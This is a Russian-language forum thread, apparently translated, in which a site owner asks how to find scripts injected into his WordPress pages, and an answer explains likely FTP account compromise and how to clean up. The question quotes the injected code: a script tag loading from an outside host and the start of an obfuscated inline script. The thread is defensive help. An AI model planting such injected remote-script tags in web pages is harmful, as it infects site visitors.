-1

Google Chrome приветствовал меня обнаружением вредоносного кода. Мне удалось отследить код в исходном коде (firebug), но я не знаю, как найти сценарии .js, в которых находятся коды. Он состоит из 2-х скриптов:

  1. <script src="http://12nwsp.serveirc.com//ml.php" type="text/javascript"> </script>
  2. <script type="text/javascript">var bWUW1aIO9J="YEXI018YEXI035";var fGdfWY1etv0="YEXI03cYEXI073YEXI063YEXI07"; и многое другое в этом.

Эти javascript-коды расположены внизу страницы после закрывающего </html> .

Забавная вещь ... Как только я создал другой поддомен на своем хосте, установил Wordpress и сделал некоторые вещи, точно такой же 12nwsp.serveirc.com вернулся.

Теперь я искал и искал, и пришел к выводу, что он вполне может быть создан с помощью iframes (и они у меня есть).

Если вы хотите посмотреть и помочь мне, это http://test.donm.nl/vanderwal (это своего рода онлайн-каталог).

Мне просто интересно, есть ли какой-нибудь инструмент или что-то, что может сказать мне, где находятся эти надоедливые скрипты Bugger, чтобы я мог их удалить.

Ty

1 ответ1

1

Тебя взломали. Вероятно, из-за компрометации учетной записи FTP: вы получаете троян на клиентском компьютере, который используется для загрузки на сайт, он крадет ваш пароль, и позже в систему входит автоматическая атака, чтобы добавить сценарии во все ваши HTML-файлы.

Вы можете использовать простой старый инструмент поиска в файлах, чтобы найти блоки <script> , но простое удаление сценариев само по себе не принесет пользы. На тебя снова нападут.

Есть и другие возможности, такие как небезопасные серверные приложения в сочетании с плохими настройками разрешений или более широкий компромисс на уровне сервера, хотя другие сайты на этом сервере, похоже, не заражены. Компромиссы учетной записи FTP - самый распространенный вектор.

Вы должны отключить ваш сайт, отсканировать все машины, которые вы использовали для доступа к FTP, с помощью нескольких контролеров. Не доверяйте только одному AV: современные антивирусные инструменты просто не справляются с широтой атак. Точно так же они далеко не гарантированно удалят все, если вы были скомпрометированы, поэтому, если вы найдете что-нибудь, или если у этой машины была какая-либо история обнаружения какого-либо трояна в прошлом, вам нужно сгладить его и переустановить ОС. (Затем убедитесь, что ваш браузер и все плагины обновлены, и удалите плагины, которые вам не нужны на 100%, чтобы избежать заражения в будущем.)

Затем вы можете изменить свой пароль FTP, удалить сценарии и вернуть сайт в режим онлайн. (И использовать SFTP в будущем.)

Всё ещё ищете ответ? Посмотрите другие вопросы с метками .